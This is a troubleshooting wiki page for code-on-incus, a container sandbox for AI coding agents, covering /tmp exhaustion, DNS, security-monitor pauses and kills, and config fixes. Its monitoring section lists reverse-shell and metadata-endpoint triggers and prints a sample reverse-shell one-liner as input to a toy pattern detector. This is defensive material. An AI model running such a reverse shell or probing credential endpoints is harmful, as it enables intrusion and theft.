Troubleshooting - mensfeld/code-on-incus GitHub Wiki
Symptom: The agent stops producing output entirely — no error, no progress, just silence for minutes at a time. Often happens partway through npm install, a cargo build, running tests, or any operation that writes a lot of temporary data.
Cause: /tmp inside the container is full. When /tmp is a tmpfs — a RAM-backed filesystem with a hard size cap — filling it causes the kernel to return ENOSPC to every process that tries to write. Most build tools (npm, cargo, pytest, TypeScript compilers, Docker) are not written to handle this gracefully — they freeze waiting for a write that will never succeed.
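This failure mode is easy to reproduce without filling anything: on Linux, the /dev/full device fails every write with ENOSPC, which is exactly the error a full tmpfs produces:

```shell
# /dev/full returns ENOSPC on every write, mimicking a full /tmp
if ! echo "payload" > /dev/full 2>/dev/null; then
  echo "write failed with ENOSPC, just as on a full tmpfs"
fi
```

Tools that check write errors report "No space left on device" here; tools that don't are the ones that silently stall.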
Common sources of large /tmp usage:

- `npm`/`yarn`/`pnpm` — package tarballs and unpack staging
- `cargo` — incremental compilation artefacts and linker inputs
- Test runners — coverage reports, snapshots, JUnit XML output
- `tsc`/Babel — intermediate `.js` files and source maps
- Docker builds — layer staging and build context tarballs
- `sort`, `grep`, `awk` on large datasets — write temp files to `/tmp` by default
Why Linux doesn't auto-clean it: Ubuntu's systemd-tmpfiles-clean.timer runs daily and only removes files older than 10 days. Nothing in a normal session ever ages out. There is no back-pressure mechanism — the kernel does not evict files when space runs low the way it pages out memory.
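That 10-day cutoff is encoded in a tmpfiles.d rule. A rule of roughly this shape (illustrative; the stock Ubuntu file may differ in details — see tmpfiles.d(5)) is what drives the age-based cleanup, and the final age field is the knob a shorter cutoff would change:

```
# Illustrative tmpfiles.d rule: clean /tmp entries older than 10 days
D /tmp 1777 root root 10d
```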
Diagnosis: From your host while the agent is running:

```bash
# Check how full /tmp is
incus exec <container-name> -- df -h /tmp

# Find the largest files/directories
incus exec <container-name> -- du -sh /tmp/* 2>/dev/null | sort -rh | head -20
```

Immediate fix (without restarting): Clear known large cache directories:

```bash
incus exec <container-name> -- find /tmp -maxdepth 1 -name 'npm-*' -exec rm -rf {} +
incus exec <container-name> -- find /tmp -maxdepth 1 -size +100M -delete
```

Permanent fix: Increase the /tmp size cap in your config (takes effect on next session start):
```toml
# ~/.coi/config.toml or .coi/config.toml in your project
[limits.disk]
tmpfs_size = "8GiB"  # default is "" (disk-backed, no size cap)
```

Alternative: Move TMPDIR onto disk instead of the RAM-backed tmpfs, avoiding the size limit entirely at the cost of slightly slower temp I/O:
```bash
# Add to your project's .claude.json or run at the start of the session
export TMPDIR=/workspace/.tmp
mkdir -p "$TMPDIR"
```

Note: /workspace/.tmp is on your host filesystem, so files persist after the session — add it to .gitignore and clean it up periodically.
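Most tools that create temp files honor TMPDIR (mktemp, Python's tempfile, npm, cargo). A quick way to confirm the redirect took effect, using a local `.tmp` directory here rather than /workspace:

```shell
# Redirect TMPDIR and confirm mktemp follows it
export TMPDIR="$PWD/.tmp"
mkdir -p "$TMPDIR"
f="$(mktemp)"
case "$f" in
  "$TMPDIR"/*) echo "temp files now land in $TMPDIR" ;;
  *)           echo "TMPDIR not honored" ;;
esac
rm -f "$f"
```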
COI's built-in protection (since v0.7.0):

- `/tmp` defaults to the container's root virtual disk — no RAM cap, shares the storage pool
- `/etc/tmpfiles.d/coi-tmp-cleanup.conf` in the base image removes files not accessed for 1 hour
- `systemd-tmpfiles-clean.timer` is overridden to run every 15 minutes so abandoned artefacts are reclaimed automatically
- An optional RAM-backed tmpfs is available by setting `tmpfs_size = "4GiB"` in `[limits.disk]`
Symptom: coi build hangs at "Still waiting for network..." even though the container has an IP address.
Cause: On Ubuntu systems with systemd-resolved, containers may receive 127.0.0.53 as their DNS server via DHCP. This is the host's stub resolver which only works on the host, not inside containers.
Automatic Fix: COI automatically detects and fixes this issue during build by:
- Detecting whether DNS resolution fails while IP connectivity works
- Injecting public DNS servers (8.8.8.8, 8.8.4.4, 1.1.1.1) into the container
- Baking static DNS configuration into the resulting image
Permanent Fix: Configure your Incus network to provide proper DNS to containers:
```bash
# Option 1: Enable managed DNS (recommended)
incus network set incusbr0 dns.mode managed

# Option 2: Use public DNS servers
incus network set incusbr0 raw.dnsmasq "dhcp-option=6,8.8.8.8,8.8.4.4"
```

After applying either fix, future containers will have working DNS automatically.
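The tell-tale sign of the stub-resolver problem is a lone 127.0.0.53 nameserver in the container's /etc/resolv.conf. A check along these lines spots it (run against sample text here; inside a container you would read the real file):

```shell
# Sample resolv.conf content as handed out via the host's stub resolver
resolv='nameserver 127.0.0.53
options edns0 trust-ad'

if printf '%s\n' "$resolv" | grep -q '^nameserver 127\.0\.0\.53'; then
  echo "stub resolver detected: DNS will fail inside containers"
fi
```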
Note: The automatic fix only affects the built image. Other Incus containers on your system may still experience DNS issues until you apply the permanent fix.
Why doesn't COI automatically run incus network set for me?
COI deliberately uses an in-container fix rather than modifying your Incus network configuration:
- System-level impact - Changing Incus network settings affects all containers on that bridge, not just COI containers
- Network name varies - The bridge might not be named `incusbr0` on all systems
- Permissions - Users running `coi build` might not have permission to modify Incus network settings
- Intentional configurations - Some users have custom DNS configurations for their other containers
- Principle of least surprise - Modifying system-level Incus config without explicit consent could break other setups
The in-container approach is self-contained and only affects COI images, leaving your Incus configuration untouched.
Symptom: Your session suddenly freezes and coi list shows the container in "Frozen" state.
Cause: The security monitoring daemon detected a HIGH-severity threat and automatically paused the container to prevent potential data exfiltration or malicious activity.
Common triggers:
- Large file read operations (>50MB) — could be legitimate if analyzing big files
- Large file write operations (>50MB) — could be legitimate if creating archives
- Suspicious process patterns that match known attack tools
Diagnosis:
```bash
# Check the audit log for what triggered the pause
cat ~/.coi/audit/<container-name>.jsonl

# Look for HIGH-level threats
grep '"level":"high"' ~/.coi/audit/<container-name>.jsonl
```

Resolution:
If the activity was legitimate (e.g., you asked the AI to analyze a large codebase):
```bash
# Unfreeze the specific container
coi unfreeze <container-name>

# Or unfreeze all frozen COI containers
coi unfreeze
```

If you're unsure, review the audit log first. Look at the `title`, `category`, and `evidence` fields to understand what was detected.
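If you only want the human-readable fields, a grep over a line of the JSONL works without extra tooling. The sample line below is illustrative; real entries may carry more fields:

```shell
# Pull the title out of a sample audit entry (shape assumed: flat JSON, one object per line)
line='{"level":"high","title":"Large file read","category":"data-access","evidence":"read 120MB from ./dataset.bin"}'
printf '%s\n' "$line" | grep -o '"title":"[^"]*"'
```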
Prevention:
For projects that legitimately need large file operations, increase the thresholds:
```toml
# ~/.coi/config.toml or .coi/config.toml
[monitoring]
file_read_threshold_mb = 200  # Increase from default 50MB
```

Note: Only increase thresholds if you understand the security implications. The defaults are set to catch most exfiltration attempts while allowing normal development work.
Symptom: Your session terminates unexpectedly and coi list shows no container for your workspace.
Cause: The security monitoring daemon detected a CRITICAL-severity threat and automatically killed the container to prevent malicious activity.
Common triggers:
- Reverse shell patterns detected (bash -i, /dev/tcp, nc with suspicious flags)
- Metadata endpoint access (169.254.169.254) — cloud credential theft attempt
- Connection to known attack ports (4444, 5555, 31337)
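For a sense of what such a detector matches on, here is a toy version of the pattern check. The patterns are illustrative only; the real monitor's rule set is not documented here, and the command line is just a string — nothing is executed:

```shell
# Toy pattern check against a classic reverse-shell one-liner (string only)
cmdline='bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'
case "$cmdline" in
  *'/dev/tcp/'*|*'bash -i'*|*' nc -e '*)
    echo "reverse shell pattern matched" ;;
esac
```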
Diagnosis:
```bash
# Check the audit log (persists after container is killed)
cat ~/.coi/audit/<container-name>.jsonl

# Look for CRITICAL-level threats
grep '"level":"critical"' ~/.coi/audit/<container-name>.jsonl
```

Resolution:
CRITICAL threats are serious and typically indicate:
- A prompt injection attack tricked the AI into malicious behavior
- Malicious code in the project attempted to run
- A false positive (rare, but possible)
Before starting a new session:
- Review what the AI was doing when killed
- Check if the project contains suspicious code
- If it was a false positive, report it as an issue
Note: Unlike HIGH threats (pause), CRITICAL threats (kill) require starting a new session. This is intentional — the container state may be compromised.
Symptom: docker compose up or docker-compose commands fail inside containers started with coi shell. Docker itself may work fine, but Compose specifically errors out.
Cause: Docker support flags (security.nesting, security.syscalls.intercept.mknod, security.syscalls.intercept.setxattr) were not being set on session containers. This was a race condition where incus launch started the container before the configuration was applied.
Fix: This was fixed in COI. The container launch now uses a three-step sequence: incus init → configure flags → incus start, ensuring Docker support flags are always applied before the container starts. Update to the latest version of COI.
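In Incus terms, the three-step sequence looks roughly like this (image name is illustrative; the flag list comes from the Cause above):

```bash
incus init images:ubuntu/22.04 <container-name>
incus config set <container-name> security.nesting=true
incus config set <container-name> security.syscalls.intercept.mknod=true
incus config set <container-name> security.syscalls.intercept.setxattr=true
incus start <container-name>
```

Because the flags are applied between init and start, the container never boots without them.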
Symptom: You see I have no name! as your shell prompt, or get Permission denied errors when accessing files like .bashrc inside the container.
Cause: The container's code user has a default UID/GID of 1000 baked into the base image, but your code_uid config is set to a different value. The mismatch means files owned by UID 1000 are inaccessible to the new UID.
Fix: COI now automatically remaps the container user's UID/GID when code_uid differs from the image default, running groupmod, usermod, and chown during session setup. Update to the latest version.
If you need to fix this manually for a persistent container:
```bash
incus exec <container-name> -- usermod -u <your-uid> code
incus exec <container-name> -- groupmod -g <your-uid> code
incus exec <container-name> -- chown -R <your-uid>:<your-uid> /home/code
```

Symptom: Security features like block_private_networks, auto_pause_on_high, or auto_kill_on_critical appear to be disabled even though you have not explicitly turned them off.
Cause: In older versions, the multi-layer config merge (global → project → CLI) used plain bool fields. When a higher-priority config file omitted a boolean field, it defaulted to false and overwrote the true value from a lower-priority config. This meant security-critical defaults could be silently lost.
Fix: This was fixed by converting 13 boolean config fields to pointer types (*bool), so omitted fields are nil (no override) rather than false. Update to the latest version.
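The practical effect: a project config that says nothing about a boolean no longer overrides the global value. An illustrative pair of fragments (key name taken from the symptoms above):

```toml
# Global (~/.coi/config.toml): security response enabled
[monitoring]
auto_pause_on_high = true

# Project (.coi/config.toml) omits the field entirely.
# Old behavior: the omitted bool decoded as false and clobbered the global true.
# Fixed behavior: the omitted field decodes to nil (*bool) and the global true survives.
```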
Verification: After updating, check that your security settings are applied:
```bash
coi health --verbose
```

Look for the Monitoring section to confirm auto_pause=true and other security settings.
Symptom: sudo firewall-cmd --direct --get-all-rules shows hundreds or thousands of stale rules. System may slow down as firewalld processes a bloated ruleset.
Cause: This could happen when containers were killed via signals, coi shutdown was used without proper cleanup, or containers crashed. Older versions had paths where deferred firewall cleanup was skipped.
Fix: COI now cleans up firewall rules on all termination paths (normal exit, shutdown, kill, security responder auto-kill). To clean up existing stale rules:
```bash
# Dry run — see what would be cleaned
coi clean --orphans --dry-run

# Clean orphaned rules, zone bindings, and veth interfaces
coi clean --orphans
```

Prevention: Always stop containers via coi shutdown or coi kill rather than directly via incus stop/delete.
Symptom: Your ~/.claude/settings.json is overwritten with sandbox/bypass settings after running coi shell. Custom settings like AWS Bedrock credentials, environment variables, or personal preferences are lost.
Cause: Older versions would overwrite the entire settings file with sandbox permissions rather than merging.
Fix: COI now performs a deep merge of settings, preserving your existing configuration while adding sandbox permissions. Your env variables, allowedTools, and other custom settings are preserved.
If your settings were already lost, restore from backup or recreate them. Going forward, updates should preserve your configuration.
Symptom: Session save fails with EXDEV (cross-device link) error, typically when /tmp and the session storage directory are on different filesystems or mount points.
Fix: COI now uses a recursive copy with proper symlink handling as a fallback when os.Rename fails with EXDEV. Update to the latest version.
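The generic pattern is the one `mv` itself uses: try the cheap rename first, and fall back to copy-plus-delete when the kernel refuses with EXDEV. A minimal sketch (the paths here are on the same filesystem, so the fast path wins, but the fallback branch is what handles the cross-device case):

```shell
src="$(mktemp)"; dst="${src}.moved"
echo "session data" > "$src"

# rename(2) via mv; the explicit fallback branch shows the pattern
# for tools that call rename directly and must handle EXDEV themselves
if ! mv "$src" "$dst" 2>/dev/null; then
  cp -p "$src" "$dst" && rm -f "$src"
fi
cat "$dst"
rm -f "$dst"
```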
Symptom: coi shell, coi run, or coi build fails immediately with an error about security.privileged=true being detected.
Cause: The default Incus profile (or the container config) has security.privileged=true set. Privileged containers disable all container isolation — seccomp, AppArmor, and UID mapping are all bypassed. COI refuses to run in this configuration because it defeats the entire security model.
Fix:
```bash
# Remove the privileged setting from the default profile
incus profile unset default security.privileged

# Verify it's gone
incus profile get default security.privileged
# Should return empty or error (meaning it's unset — which is the safe default)
```

Verification:
```bash
coi health
# Should show:
# [OK] Privileged check : Default profile uses unprivileged containers
# [OK] Security posture : Full isolation — unprivileged containers with seccomp and AppArmor
```

Note: Incus containers are unprivileged by default. This setting is only present if someone explicitly set it. If you need privileged containers for other (non-COI) workloads, use a separate Incus profile rather than changing the default.
Symptom: coi shell, coi run, or coi build prints a warning on stderr about the host kernel being below 5.15.
Cause: Kernels older than 5.15 may lack security features (user namespaces, seccomp improvements, cgroup v2) that Incus relies on for safe container isolation. COI warns but does not block — containers will still start.
What to do:
- If your system is running a recent distribution (Ubuntu 22.04+, Fedora 36+, Debian 12+), you likely already have kernel >= 5.15
- If you see this warning, consider upgrading your kernel or distribution
- The warning is informational — COI will continue to work, but isolation may be weaker on very old kernels
Verification:
```bash
uname -r
# Should show 5.15 or higher

coi health
# Should show:
# [OK] Kernel version : Kernel 6.x.x (>= 5.15)
```

Note: This check is skipped on macOS/darwin and on any failure to read the kernel version.
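The version comparison itself is a simple major/minor parse of the release string; a sketch of the check, with the 5.15 threshold from above:

```shell
# Compare a kernel release string against the 5.15 minimum
check_kernel() {
  major="${1%%.*}"          # text before the first dot
  rest="${1#*.}"
  minor="${rest%%.*}"       # text between the first and second dots
  if [ "$major" -gt 5 ] || { [ "$major" -eq 5 ] && [ "$minor" -ge 15 ]; }; then
    echo "ok: $1 >= 5.15"
  else
    echo "warn: $1 < 5.15"
  fi
}

check_kernel "5.14.0-1059-aws"
check_kernel "6.8.0-41-generic"
```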
If none of the above solved your problem, join us on Slack — the community is happy to help.